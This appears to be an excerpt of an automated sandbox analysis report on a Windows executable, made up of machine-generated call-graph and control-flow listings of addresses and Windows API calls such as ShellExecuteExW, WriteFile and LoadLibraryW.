_handle_error 8 API calls 22306->22307 22308 7ff7f4d833b8 22307->22308 22308->22023 22309 7ff7f4d83194 22312 7ff7f4d612bc 33 API calls 22309->22312 22310->22309 22392 7ff7f4d70a5c CompareStringW 22310->22392 22313 7ff7f4d831d0 22312->22313 22314 7ff7f4d6587c 51 API calls 22313->22314 22315 7ff7f4d831da 22314->22315 22316 7ff7f4d61b70 31 API calls 22315->22316 22318 7ff7f4d831e5 22316->22318 22317 7ff7f4d83252 ShellExecuteExW 22319 7ff7f4d83265 22317->22319 22321 7ff7f4d83356 22317->22321 22318->22317 22320 7ff7f4d612bc 33 API calls 22318->22320 22322 7ff7f4d8329e 22319->22322 22325 7ff7f4d832f3 CloseHandle 22319->22325 22330 7ff7f4d83291 ShowWindow 22319->22330 22323 7ff7f4d83227 22320->22323 22321->22304 22324 7ff7f4d8340b 22321->22324 22394 7ff7f4d838e8 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 22322->22394 22393 7ff7f4d672ac 53 API calls 2 library calls 22323->22393 22327 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 22324->22327 22328 7ff7f4d83311 22325->22328 22329 7ff7f4d83302 22325->22329 22333 7ff7f4d83410 22327->22333 22328->22321 22337 7ff7f4d83347 ShowWindow 22328->22337 22395 7ff7f4d70a5c CompareStringW 22329->22395 22330->22322 22332 7ff7f4d83235 22336 7ff7f4d61b70 31 API calls 22332->22336 22335 7ff7f4d832b6 22335->22325 22339 7ff7f4d832c4 GetExitCodeProcess 22335->22339 22338 7ff7f4d8323f 22336->22338 22337->22321 22338->22317 22339->22325 22340 7ff7f4d832d7 22339->22340 22340->22325 22341->22072 22342->22072 22343->22072 22344->22072 22345->22072 22346->22072 22347->22072 22348->22072 22349->22072 22350->22072 22352 7ff7f4d657bb DeleteFileW 22351->22352 22353 7ff7f4d657b8 22351->22353 22354 7ff7f4d657d1 22352->22354 22361 7ff7f4d65850 22352->22361 22353->22352 22356 7ff7f4d680b0 49 API calls 22354->22356 22355 7ff7f4d85bf0 _handle_error 8 API calls 22357 7ff7f4d65865 22355->22357 22358 7ff7f4d657f6 22356->22358 22357->22072 22359 7ff7f4d65817 22358->22359 22360 7ff7f4d657fa DeleteFileW 22358->22360 22359->22361 22362 7ff7f4d65875 22359->22362 22360->22359 22361->22355 22363 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 22362->22363 22364 7ff7f4d6587a 22363->22364 22365->22072 22367->22072 22368->22072 22369->22072 22370->22072 22371->22072 22372->22072 22374 7ff7f4d6d152 22373->22374 22375 7ff7f4d6d185 22374->22375 22376 7ff7f4d61734 33 API calls 22374->22376 22375->22074 22376->22374 22377->21975 22388->22262 22389->22270 22390->22284 22391->22299 22392->22309 22393->22332 22394->22335 22395->22328 22397 7ff7f4d79a40 memcpy_s _snwprintf 22396->22397 22414 7ff7f4d6bb98 22397->22414 22399 7ff7f4d79ade memcpy_s 22417 7ff7f4d794d8 22399->22417 22403 7ff7f4d79b48 22404 7ff7f4d79b8b 22403->22404 22407 7ff7f4d79cb4 22403->22407 22428 7ff7f4d79cbc 22404->22428 22408 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 22407->22408 22410 7ff7f4d79cb9 22408->22410 22411 7ff7f4d85bf0 _handle_error 8 API calls 22412 7ff7f4d79c9e 22411->22412 22412->21755 22413 7ff7f4d79b99 22413->22411 22415 7ff7f4d613c4 33 API calls 22414->22415 22416 7ff7f4d6bbbd 22415->22416 22416->22399 22418 7ff7f4d7955f memcpy_s 22417->22418 22418->22418 22419 7ff7f4d61b70 31 API calls 22418->22419 22420 7ff7f4d79790 memcpy_s 22418->22420 22419->22420 22421 7ff7f4d7982f 22420->22421 22456 7ff7f4d77f70 33 API calls 22420->22456 22423 7ff7f4d6bbf4 22421->22423 22424 7ff7f4d6bc02 shared_ptr 22423->22424 22425 7ff7f4d6bc35 22424->22425 22426 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 22424->22426 22425->22403 22427 7ff7f4d6bc56 22426->22427 22429 7ff7f4d79cca 22428->22429 22430 7ff7f4d79b95 22429->22430 22457 7ff7f4d63c7c 82 API calls 22429->22457 22430->22413 22432 7ff7f4d76cf0 22430->22432 22458 7ff7f4d776c0 22432->22458 22435 7ff7f4d76f1c 22437 7ff7f4d76f1a 22435->22437 22506 7ff7f4d63ca0 100 API calls 22435->22506 22439 7ff7f4d85bf0 _handle_error 8 API calls 22437->22439 22441 7ff7f4d76f6a 22439->22441 22440 7ff7f4d62314 33 API calls 22448 7ff7f4d76d4d 22440->22448 22441->22413 22443 7ff7f4d66288 55 API calls 22443->22448 22444 7ff7f4d76ee7 22498 7ff7f4d75214 22444->22498 22445 7ff7f4d76f8c 22449 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 22445->22449 22446 7ff7f4d76e68 22446->22444 22446->22445 22450 7ff7f4d76f87 22446->22450 22448->22437 22448->22440 22448->22443 22448->22445 22448->22446 22448->22450 22487 7ff7f4d71d98 22448->22487 22452 7ff7f4d76f92 22449->22452 22453 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 22450->22453 22451 7ff7f4d76eff 22451->22435 22454 7ff7f4d76f0b 22451->22454 22453->22445 22505 7ff7f4d639e0 82 API calls 22454->22505 22456->22421 22457->22430 22459 7ff7f4d66288 55 API calls 22458->22459 22460 7ff7f4d77728 22459->22460 22464 7ff7f4d77743 22460->22464 22507 7ff7f4d74e30 22460->22507 22463 7ff7f4d7796e 22466 7ff7f4d85bf0 _handle_error 8 API calls 22463->22466 22464->22463 22468 7ff7f4d779a3 22464->22468 22469 7ff7f4d76d22 22466->22469 22470 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 22468->22470 22469->22435 22469->22448 22504 7ff7f4d639e0 82 API calls 22469->22504 22472 7ff7f4d779a8 22470->22472 22477 7ff7f4d75214 103 API calls 22478 7ff7f4d77842 22477->22478 22478->22464 22558 7ff7f4d74ff4 22478->22558 22481 7ff7f4d75214 103 API calls 22482 7ff7f4d778a9 22481->22482 22482->22464 22483 7ff7f4d74ff4 120 API calls 22482->22483 22484 7ff7f4d77888 22483->22484 22484->22464 22564 7ff7f4d639e0 82 API calls 22484->22564 22488 7ff7f4d71bbc 64 API calls 22487->22488 22489 7ff7f4d71dc1 22488->22489 22490 7ff7f4d661e8 swprintf 46 API calls 22489->22490 22491 7ff7f4d71df2 22490->22491 22492 7ff7f4d612bc 33 API calls 22491->22492 22493 7ff7f4d71e1d 22492->22493 22494 7ff7f4d68d18 47 API calls 22493->22494 22495 7ff7f4d71e2a 22494->22495 22496 7ff7f4d85bf0 _handle_error 8 API calls 22495->22496 22497 7ff7f4d71e3a 22496->22497 22497->22448 22499 7ff7f4d75248 22498->22499 22500 7ff7f4d75252 22498->22500 22499->22451 22500->22499 22502 7ff7f4d64c40 101 API calls 22500->22502 22501 7ff7f4d75276 22503 7ff7f4d64d50 101 API calls 22501->22503 22502->22501 22503->22499 22504->22448 22505->22437 22508 7ff7f4d85aa0 4 API calls 22507->22508 22509 7ff7f4d74e3e 22508->22509 22513 7ff7f4d646a0 54 API calls 22509->22513 22510 7ff7f4d74e85 22512 7ff7f4d74e9c 22510->22512 22565 7ff7f4d63cd0 100 API calls 2 library calls 22510->22565 22512->22464 22514 7ff7f4d79d70 22512->22514 22513->22510 22524 7ff7f4d64c40 101 API calls 22514->22524 22515 7ff7f4d79da5 22521 7ff7f4d64a70 104 API calls 22515->22521 22516 7ff7f4d79e11 22518 7ff7f4d85bf0 _handle_error 8 API calls 22516->22518 22517 7ff7f4d79dc0 22517->22516 22522 7ff7f4d64c40 101 API calls 22517->22522 22519 7ff7f4d77757 22518->22519 22525 7ff7f4d645f0 22519->22525 22520 7ff7f4d79df6 22523 7ff7f4d64a70 104 API calls 22520->22523 22521->22517 22522->22520 22523->22516 22524->22515 22530 7ff7f4d64d50 101 API calls 22525->22530 22526 7ff7f4d6460f 22531 7ff7f4d64c40 101 API calls 22526->22531 22527 7ff7f4d64628 22532 7ff7f4d64d50 101 API calls 22527->22532 22528 7ff7f4d64638 22533 7ff7f4d64c40 101 API calls 22528->22533 22529 7ff7f4d64651 22534 7ff7f4d7717c 22529->22534 22530->22526 22531->22527 22532->22528 22533->22529 22535 7ff7f4d771be 22534->22535 22536 7ff7f4d77252 22534->22536 22537 7ff7f4d75384 120 API calls 22535->22537 22539 7ff7f4d772be 22536->22539 22551 7ff7f4d64c40 101 API calls 22536->22551 22545 7ff7f4d771e9 22537->22545 22538 7ff7f4d77295 22550 7ff7f4d64d50 101 API calls 22538->22550 22544 7ff7f4d75384 120 API calls 22539->22544 22539->22545 22549 7ff7f4d7741b 22539->22549 22540 7ff7f4d74ff4 120 API calls 22547 7ff7f4d77456 22540->22547 22541 7ff7f4d772a9 22566 7ff7f4d75384 22541->22566 22543 7ff7f4d85bf0 _handle_error 8 API calls 22546 7ff7f4d77514 22543->22546 22544->22539 22545->22540 22545->22549 22546->22464 22552 7ff7f4d77f24 22546->22552 22547->22549 22594 7ff7f4d76f94 22547->22594 22549->22543 22550->22541 22551->22538 22553 7ff7f4d777af 22552->22553 22554 7ff7f4d77f38 22552->22554 22553->22464 22553->22477 22554->22553 22684 7ff7f4d74a60 22554->22684 22559 7ff7f4d750c0 22558->22559 22561 7ff7f4d7501c memcpy_s 22558->22561 22559->22481 22559->22484 22560 7ff7f4d75384 120 API calls 22560->22561 22561->22559 22561->22560 22562 7ff7f4d750a6 22561->22562 22714 7ff7f4d63dc4 99 API calls 22562->22714 22564->22464 22565->22512 22593 7ff7f4d64a70 104 API calls 22566->22593 22567 7ff7f4d85bf0 _handle_error 8 API calls 22568 7ff7f4d7563b 22567->22568 22568->22539 22569 7ff7f4d753d0 22570 7ff7f4d66288 55 API calls 22569->22570 22582 7ff7f4d755e9 22569->22582 22571 7ff7f4d7544b 22570->22571 22572 7ff7f4d754c9 22571->22572 22573 7ff7f4d75473 22571->22573 22574 7ff7f4d754c7 22572->22574 22576 7ff7f4d71d98 64 API calls 22572->22576 22573->22574 22601 7ff7f4d71bbc 22573->22601 22577 7ff7f4d74e30 107 API calls 22574->22577 22576->22574 22580 7ff7f4d75503 22577->22580 22578 7ff7f4d75484 22579 7ff7f4d612bc 33 API calls 22578->22579 22581 7ff7f4d754bb 22579->22581 22583 7ff7f4d612bc 33 API calls 22580->22583 22592 7ff7f4d75557 22580->22592 22632 7ff7f4d68d18 22581->22632 22582->22567 22587 7ff7f4d75543 22583->22587 22585 7ff7f4d75657 22586 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 22585->22586 22588 7ff7f4d7565c 22586->22588 22648 7ff7f4d700d0 22587->22648 22590 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 22588->22590 22591 7ff7f4d75662 22590->22591 22592->22582 22592->22585 22592->22588 22593->22569 22680 7ff7f4d77c90 22594->22680 22597 7ff7f4d74ff4 120 API calls 22600 7ff7f4d77003 22597->22600 22598 7ff7f4d85bf0 _handle_error 8 API calls 22599 7ff7f4d7715b 22598->22599 22599->22549 22600->22598 22664 7ff7f4d67af8 47 API calls 22601->22664 22603 7ff7f4d71bf6 22604 7ff7f4d612bc 33 API calls 22603->22604 22605 7ff7f4d71c22 22604->22605 22665 7ff7f4d70a5c CompareStringW 22605->22665 22607 7ff7f4d71c4a 22609 7ff7f4d612bc 33 API calls 22607->22609 22610 7ff7f4d71ca4 22607->22610 22608 7ff7f4d71d43 22612 7ff7f4d61b70 31 API calls 22608->22612 22611 7ff7f4d71c79 22609->22611 22610->22608 22615 7ff7f4d71d8f 22610->22615 22616 7ff7f4d71d8a 22610->22616 22666 7ff7f4d70a8c CompareStringW 22611->22666 22614 7ff7f4d71d62 22612->22614 22617 7ff7f4d85bf0 _handle_error 8 API calls 22614->22617 22618 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 22615->22618 22621 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 22616->22621 22620 7ff7f4d71d71 22617->22620 22619 7ff7f4d71d95 22618->22619 22622 7ff7f4d71bbc 64 API calls 22619->22622 22620->22578 22621->22615 22623 7ff7f4d71dc1 22622->22623 22624 7ff7f4d661e8 swprintf 46 API calls 22623->22624 22625 7ff7f4d71df2 22624->22625 22626 7ff7f4d612bc 33 API calls 22625->22626 22627 7ff7f4d71e1d 22626->22627 22628 7ff7f4d68d18 47 API calls 22627->22628 22629 7ff7f4d71e2a 22628->22629 22630 7ff7f4d85bf0 _handle_error 8 API calls 22629->22630 22631 7ff7f4d71e3a 22630->22631 22631->22578 22633 7ff7f4d68d41 22632->22633 22634 7ff7f4d68d4d 22633->22634 22635 7ff7f4d68dbe 22633->22635 22636 7ff7f4d66e5c 33 API calls 22634->22636 22667 7ff7f4d6353c 47 API calls 22635->22667 22638 7ff7f4d68d78 22636->22638 22649 7ff7f4d83bb8 22648->22649 22650 7ff7f4d68b28 47 API calls 22649->22650 22651 7ff7f4d83beb 22650->22651 22652 7ff7f4d6aee0 48 API calls 22651->22652 22653 7ff7f4d83bff 22652->22653 22654 7ff7f4d6d9c0 48 API calls 22653->22654 22655 7ff7f4d83c0f 22654->22655 22656 7ff7f4d61b70 31 API calls 22655->22656 22657 7ff7f4d83c1a 22656->22657 22668 7ff7f4d8372c 22657->22668 22664->22603 22665->22607 22666->22610 22669 7ff7f4d83758 22668->22669 22670 7ff7f4d612bc 33 API calls 22669->22670 22671 7ff7f4d83768 22670->22671 22672 7ff7f4d82bb4 24 API calls 22671->22672 22674 7ff7f4d83775 22672->22674 22673 7ff7f4d837af 22674->22673 22682 7ff7f4d77ce5 memcpy_s 22680->22682 22681 7ff7f4d76fd7 22681->22597 22681->22600 22682->22681 22683 7ff7f4d64c40 101 API calls 22682->22683 22683->22682 22685 7ff7f4d74a9a 22684->22685 22698 7ff7f4d74a93 22684->22698 22686 7ff7f4d74ad8 22685->22686 22688 7ff7f4d74b20 22685->22688 22694 7ff7f4d74aa7 22685->22694 22690 7ff7f4d75214 103 API calls 22686->22690 22687 7ff7f4d85bf0 _handle_error 8 API calls 22689 7ff7f4d74d1d 22687->22689 22711 7ff7f4d746d8 33 API calls memcpy_s 22688->22711 22689->22553 22710 7ff7f4d63834 82 API calls 2 library calls 22689->22710 22690->22698 22692 7ff7f4d74b61 22693 7ff7f4d74ff4 120 API calls 22692->22693 22703 7ff7f4d74b78 22693->22703 22694->22686 22695 7ff7f4d74afc 22694->22695 22694->22698 22697 7ff7f4d74ff4 120 API calls 22695->22697 22696 7ff7f4d74b7c 22696->22698 22700 7ff7f4d74d35 22696->22700 22697->22698 22698->22687 22699 7ff7f4d74c0c 22712 7ff7f4d7a160 34 API calls 22699->22712 22701 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 22700->22701 22704 7ff7f4d74d3a 22701->22704 22703->22696 22703->22699 22705 7ff7f4d74c1e 22703->22705 22713 7ff7f4d6ccfc 49 API calls 2 library calls 22705->22713 22706 7ff7f4d74c1c 22707 7ff7f4d68e0c 33 API calls 22706->22707 22708 7ff7f4d74c6a 22707->22708 22708->22686 22708->22696 22708->22700 22710->22553 22711->22692 22713->22706 22714->22559 22715->22106 22716->22112 22717->22115 22943 7ff7f4d84936 14 API calls _com_raise_error 21451 7ff7f4d6e71c 21454 7ff7f4d6e77c SystemTimeToFileTime 21451->21454 21455 7ff7f4d6e7ee 21454->21455 21462 7ff7f4d6e873 21454->21462 21456 7ff7f4d66768 9 API calls 21455->21456 21458 7ff7f4d6e7f3 21456->21458 21457 7ff7f4d85bf0 _handle_error 8 API calls 21459 7ff7f4d6e777 21457->21459 21460 7ff7f4d6e7fe LocalFileTimeToFileTime 21458->21460 21461 7ff7f4d6e80a FileTimeToSystemTime TzSpecificLocalTimeToSystemTime SystemTimeToFileTime SystemTimeToFileTime 21458->21461 21460->21462 21461->21462 21462->21457 21495 7ff7f4d90e1c 21496 7ff7f4d90e67 21495->21496 21500 7ff7f4d90e2b abort 21495->21500 21502 7ff7f4d90b6c 15 API calls _set_errno_from_matherr 21496->21502 21498 7ff7f4d90e4e RtlAllocateHeap 21499 7ff7f4d90e65 21498->21499 21498->21500 21500->21496 21500->21498 21501 7ff7f4d8f088 abort 2 API calls 21500->21501 21501->21500 21502->21499 22760 7ff7f4d73e28 22761 7ff7f4d73e8a 22760->22761 22764 7ff7f4d73ecd 22760->22764 22809 7ff7f4d74eac 22761->22809 22766 7ff7f4d73f7c 22764->22766 22807 7ff7f4d64c40 101 API calls 22764->22807 22765 7ff7f4d6552c 56 API calls 22767 7ff7f4d73ea5 22765->22767 22768 7ff7f4d73fa8 22766->22768 22787 7ff7f4d74011 22766->22787 22769 7ff7f4d74eac 59 API calls 22767->22769 22771 7ff7f4d73feb 22768->22771 22775 7ff7f4d73fb2 22768->22775 22772 7ff7f4d73eaa 22769->22772 22770 7ff7f4d73f54 22825 7ff7f4d64e00 SetEndOfFile 22770->22825 22826 7ff7f4d75b28 22771->22826 22772->22764 22776 7ff7f4d73eae 22772->22776 22846 7ff7f4d64160 82 API calls 22775->22846 22845 7ff7f4d63a9c 99 API calls 22776->22845 22777 7ff7f4d73f60 22808 7ff7f4d64c40 101 API calls 22777->22808 22781 7ff7f4d73ec4 22785 7ff7f4d85bf0 _handle_error 8 API calls 22781->22785 22782 7ff7f4d73ff9 22788 7ff7f4d74130 22782->22788 22863 7ff7f4d63c7c 82 API calls 22782->22863 22783 7ff7f4d73fc8 22783->22781 22786 7ff7f4d74908 106 API calls 22783->22786 22784 7ff7f4d74d3c 104 API calls 22784->22782 22789 7ff7f4d742b8 22785->22789 22790 7ff7f4d73fdb 22786->22790 22804 7ff7f4d740f4 22787->22804 22847 7ff7f4d750e4 22787->22847 22856 7ff7f4d700ac 22787->22856 22859 7ff7f4d74d3c 22787->22859 22795 7ff7f4d741c5 22788->22795 22864 7ff7f4d78d74 8 API calls 22788->22864 22793 7ff7f4d65790 51 API calls 22790->22793 22793->22781 22797 7ff7f4d7420c 22795->22797 22865 7ff7f4d638e0 82 API calls 2 library calls 22795->22865 22796 7ff7f4d74156 22796->22795 22806 7ff7f4d750e4 120 API calls 22796->22806 22798 7ff7f4d74289 22797->22798 22799 7ff7f4d74297 22797->22799 22866 7ff7f4d64e00 SetEndOfFile 22797->22866 22798->22799 22837 7ff7f4d74908 22798->22837 22799->22781 22803 7ff7f4d65790 51 API calls 22799->22803 22803->22781 22804->22782 22804->22784 22806->22796 22807->22770 22808->22766 22810 7ff7f4d66288 55 API calls 22809->22810 22811 7ff7f4d74f0a 22810->22811 22812 7ff7f4d74f23 22811->22812 22814 7ff7f4d74f1b 22811->22814 22813 7ff7f4d85aa0 4 API calls 22812->22813 22816 7ff7f4d74f2d 22813->22816 22867 7ff7f4d65db0 51 API calls 2 library calls 22814->22867 22817 7ff7f4d64334 51 API calls 22816->22817 22819 7ff7f4d74f5c 22817->22819 22818 7ff7f4d74fc3 22820 7ff7f4d85bf0 _handle_error 8 API calls 22818->22820 22819->22818 22821 7ff7f4d74feb 22819->22821 22822 7ff7f4d73e8f 22820->22822 22823 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 22821->22823 22822->22764 22822->22765 22824 7ff7f4d74ff0 22823->22824 22825->22777 22831 7ff7f4d75b61 22826->22831 22827 7ff7f4d750e4 120 API calls 22827->22831 22831->22827 22832 7ff7f4d700ac SendDlgItemMessageW 22831->22832 22833 7ff7f4d75dd6 22831->22833 22834 7ff7f4d75d59 22831->22834 22836 7ff7f4d64d50 101 API calls 22831->22836 22868 7ff7f4d7625c 22831->22868 22890 7ff7f4d76b28 22831->22890 22899 7ff7f4d76964 125 API calls _handle_error 22831->22899 22832->22831 22833->22782 22834->22833 22835 7ff7f4d74d3c 104 API calls 22834->22835 22835->22833 22836->22831 22838 7ff7f4d74922 22837->22838 22843 7ff7f4d7497a 22837->22843 22909 7ff7f4d64c70 22838->22909 22840 7ff7f4d74966 22844 7ff7f4d642d0 100 API calls 22840->22844 22841 7ff7f4d749f5 22841->22799 22842 7ff7f4d65ff4 51 API calls 22842->22841 22843->22841 22843->22842 22844->22843 22845->22781 22846->22783 22848 7ff7f4d750ff 22847->22848 22854 7ff7f4d750f7 22847->22854 22849 7ff7f4d75384 120 API calls 22848->22849 22851 7ff7f4d75152 22848->22851 22848->22854 22850 7ff7f4d7513e 22849->22850 22850->22851 22852 7ff7f4d751a9 22850->22852 22850->22854 22851->22854 22914 7ff7f4d78d2c 8 API calls 22851->22914 22915 7ff7f4d63df0 99 API calls 2 library calls 22852->22915 22854->22787 22856->22787 22857 7ff7f4d83a40 22856->22857 22858 7ff7f4d83a4f SendDlgItemMessageW 22857->22858 22860 7ff7f4d74d75 22859->22860 22861 7ff7f4d74d9b 22860->22861 22916 7ff7f4d64e18 22860->22916 22861->22787 22863->22788 22864->22796 22865->22797 22866->22798 22867->22812 22870 7ff7f4d762b3 memcpy_s 22868->22870 22869 7ff7f4d750e4 120 API calls 22869->22870 22870->22869 22872 7ff7f4d76305 22870->22872 22871 7ff7f4d750e4 120 API calls 22871->22872 22872->22871 22874 7ff7f4d76367 22872->22874 22889 7ff7f4d764d2 22872->22889 22873 7ff7f4d85bf0 _handle_error 8 API calls 22875 7ff7f4d76943 22873->22875 22876 7ff7f4d750e4 120 API calls 22874->22876 22877 7ff7f4d763c0 22874->22877 22874->22889 22875->22831 22876->22874 22878 7ff7f4d7646a 22877->22878 22880 7ff7f4d750e4 120 API calls 22877->22880 22877->22889 22900 7ff7f4d75664 22878->22900 22880->22877 22881 7ff7f4d76714 22883 7ff7f4d75664 8 API calls 22881->22883 22882 7ff7f4d764c8 22882->22881 22884 7ff7f4d750e4 120 API calls 22882->22884 22882->22889 22885 7ff7f4d76788 22883->22885 22884->22882 22886 7ff7f4d75664 8 API calls 22885->22886 22885->22889 22887 7ff7f4d7685e 22886->22887 22887->22889 22904 7ff7f4d75e0c 22887->22904 22889->22873 22893 7ff7f4d76b70 22890->22893 22891 7ff7f4d750e4 120 API calls 22891->22893 22892 7ff7f4d76ba7 22894 7ff7f4d750e4 120 API calls 22892->22894 22895 7ff7f4d76bb6 22892->22895 22898 7ff7f4d76bf5 22892->22898 22893->22891 22893->22892 22894->22892 22895->22831 22896 7ff7f4d750e4 120 API calls 22896->22898 22897 7ff7f4d74d3c 104 API calls 22897->22898 22898->22895 22898->22896 22898->22897 22899->22831 22903 7ff7f4d756c6 memcpy_s 22900->22903 22901 7ff7f4d85bf0 _handle_error 8 API calls 22902 7ff7f4d75ab1 22901->22902 22902->22882 22903->22901 22908 7ff7f4d75e6f 22904->22908 22905 7ff7f4d76228 22905->22889 22906 7ff7f4d74d3c 104 API calls 22906->22908 22907 7ff7f4d750e4 120 API calls 22907->22908 22908->22905 22908->22906 22908->22907 22910 7ff7f4d64c94 22909->22910 22913 7ff7f4d64ca4 22909->22913 22911 7ff7f4d64c9a FlushFileBuffers 22910->22911 22910->22913 22911->22913 22912 7ff7f4d64d0e SetFileTime 22912->22840 22913->22912 22915->22854 22917 7ff7f4d64e4b 22916->22917 22918 7ff7f4d64e44 22916->22918 22919 7ff7f4d64e55 GetStdHandle 22917->22919 22925 7ff7f4d64e63 22917->22925 22920 7ff7f4d85bf0 _handle_error 8 API calls 22918->22920 22919->22925 22921 7ff7f4d64fee 22920->22921 22921->22861 22922 7ff7f4d64ebe WriteFile 22922->22925 22923 7ff7f4d64e7e WriteFile 22924 7ff7f4d64eb4 22923->22924 22923->22925 22924->22923 22924->22925 22925->22918 22925->22922 22925->22923 22927 7ff7f4d64f56 22925->22927 22935 7ff7f4d63a18 101 API calls 22925->22935 22928 7ff7f4d612bc 33 API calls 22927->22928 22929 7ff7f4d64f85 22928->22929 22936 7ff7f4d64190 99 API calls Concurrency::cancel_current_task 22929->22936 22935->22925

                                                        Executed Functions

                                                        Function 00007FF7F4D6DC08 Relevance: 154.6, APIs: 22, Strings: 66, Instructions: 610libraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 7ff7f4d6dc08-7ff7f4d6dc6c call 7ff7f4d613c4 GetSystemDirectoryW 3 7ff7f4d6dc6e-7ff7f4d6dc70 0->3 4 7ff7f4d6dc75-7ff7f4d6dcf0 call 7ff7f4d8aecc call 7ff7f4d612bc call 7ff7f4d8aecc call 7ff7f4d612bc call 7ff7f4d688f8 0->4 5 7ff7f4d6ddd5-7ff7f4d6dddc 3->5 30 7ff7f4d6dd24-7ff7f4d6dd3d 4->30 31 7ff7f4d6dcf2-7ff7f4d6dd04 4->31 7 7ff7f4d6de0d-7ff7f4d6de34 call 7ff7f4d85bf0 5->7 8 7ff7f4d6ddde-7ff7f4d6ddf1 5->8 10 7ff7f4d6de08 call 7ff7f4d85adc 8->10 11 7ff7f4d6ddf3-7ff7f4d6de06 8->11 10->7 11->10 14 7ff7f4d6de35-7ff7f4d6de3a call 7ff7f4d8ae54 11->14 22 7ff7f4d6de3b-7ff7f4d6de40 call 7ff7f4d8ae54 14->22 29 7ff7f4d6de41-7ff7f4d6de46 call 7ff7f4d8ae54 22->29 38 7ff7f4d6de47-7ff7f4d6dea4 call 7ff7f4d8ae54 call 7ff7f4d85c50 GetModuleHandleW 29->38 36 7ff7f4d6dd71-7ff7f4d6dd90 LoadLibraryW 30->36 37 7ff7f4d6dd3f-7ff7f4d6dd51 30->37 34 7ff7f4d6dd06-7ff7f4d6dd19 31->34 35 7ff7f4d6dd1f call 7ff7f4d85adc 31->35 34->22 34->35 35->30 42 7ff7f4d6ddc4-7ff7f4d6ddd1 36->42 43 7ff7f4d6dd92-7ff7f4d6dda4 36->43 40 7ff7f4d6dd6c call 7ff7f4d85adc 37->40 41 7ff7f4d6dd53-7ff7f4d6dd66 37->41 53 7ff7f4d6defb-7ff7f4d6e225 38->53 54 7ff7f4d6dea6-7ff7f4d6deb9 GetProcAddress 38->54 40->36 41->29 41->40 42->5 46 7ff7f4d6dda6-7ff7f4d6ddb9 43->46 47 7ff7f4d6ddbf call 7ff7f4d85adc 43->47 46->38 46->47 47->42 57 7ff7f4d6e22b-7ff7f4d6e234 call 7ff7f4d8ebfc 53->57 58 7ff7f4d6e383-7ff7f4d6e3a1 call 7ff7f4d67c10 call 7ff7f4d68b28 53->58 55 7ff7f4d6debb-7ff7f4d6deca 54->55 56 7ff7f4d6ded3-7ff7f4d6dee6 GetProcAddress 54->56 55->56 56->53 61 7ff7f4d6dee8-7ff7f4d6def8 56->61 57->58 64 7ff7f4d6e23a-7ff7f4d6e27d call 7ff7f4d67c10 CreateFileW 57->64 70 7ff7f4d6e3a5-7ff7f4d6e3af call 7ff7f4d66768 58->70 61->53 71 7ff7f4d6e283-7ff7f4d6e296 SetFilePointer 64->71 72 7ff7f4d6e370-7ff7f4d6e37e CloseHandle call 7ff7f4d61b70 64->72 77 7ff7f4d6e3e4-7ff7f4d6e42c call 7ff7f4d8aecc call 7ff7f4d612bc call 7ff7f4d68dc4 call 7ff7f4d61b70 call 7ff7f4d65890 70->77 78 7ff7f4d6e3b1-7ff7f4d6e3bc call 7ff7f4d6dc08 70->78 71->72 74 7ff7f4d6e29c-7ff7f4d6e2be ReadFile 71->74 72->58 74->72 79 7ff7f4d6e2c4-7ff7f4d6e2d2 74->79 131 7ff7f4d6e431-7ff7f4d6e434 77->131 78->77 88 7ff7f4d6e3be-7ff7f4d6e3e2 CompareStringW 78->88 82 7ff7f4d6e2d8-7ff7f4d6e32c call 7ff7f4d8aecc call 7ff7f4d612bc 79->82 83 7ff7f4d6e680-7ff7f4d6e698 call 7ff7f4d85db4 call 7ff7f4d700bc call 7ff7f4d700c4 79->83 103 7ff7f4d6e343-7ff7f4d6e359 call 7ff7f4d6cf94 82->103 117 7ff7f4d6e6ab-7ff7f4d6e6b2 83->117 118 7ff7f4d6e69a-7ff7f4d6e6a6 call 7ff7f4d63b84 83->118 88->77 93 7ff7f4d6e43d-7ff7f4d6e446 88->93 93->70 97 7ff7f4d6e44c 93->97 101 7ff7f4d6e451-7ff7f4d6e454 97->101 106 7ff7f4d6e456-7ff7f4d6e459 101->106 107 7ff7f4d6e4bf-7ff7f4d6e4c2 101->107 115 7ff7f4d6e32e-7ff7f4d6e33e call 7ff7f4d6dc08 103->115 116 7ff7f4d6e35b-7ff7f4d6e36b call 7ff7f4d61b70 * 2 103->116 113 7ff7f4d6e45d-7ff7f4d6e4ad call 7ff7f4d8aecc call 7ff7f4d612bc call 7ff7f4d68dc4 call 7ff7f4d61b70 call 7ff7f4d65890 106->113 111 7ff7f4d6e4c8-7ff7f4d6e4db call 7ff7f4d68be4 call 7ff7f4d66768 107->111 112 7ff7f4d6e642-7ff7f4d6e67f call 7ff7f4d61b70 * 2 call 7ff7f4d85bf0 107->112 143 7ff7f4d6e586-7ff7f4d6e5d3 call 7ff7f4d6d9c0 AllocConsole 111->143 144 7ff7f4d6e4e1-7ff7f4d6e581 call 7ff7f4d6dc08 * 2 call 7ff7f4d6aee0 call 7ff7f4d6d9c0 call 7ff7f4d6aee0 call 7ff7f4d6db54 call 7ff7f4d7c3a8 call 7ff7f4d619d0 111->144 167 7ff7f4d6e4bc 113->167 168 7ff7f4d6e4af-7ff7f4d6e4b8 113->168 115->103 116->72 127 7ff7f4d6e6c5-7ff7f4d6e6ce SetThreadExecutionState 117->127 128 7ff7f4d6e6b4-7ff7f4d6e6c0 call 7ff7f4d63b84 117->128 118->117 128->127 137 7ff7f4d6e44e 131->137 138 7ff7f4d6e436 131->138 137->101 138->93 155 7ff7f4d6e5d5-7ff7f4d6e62a GetCurrentProcessId 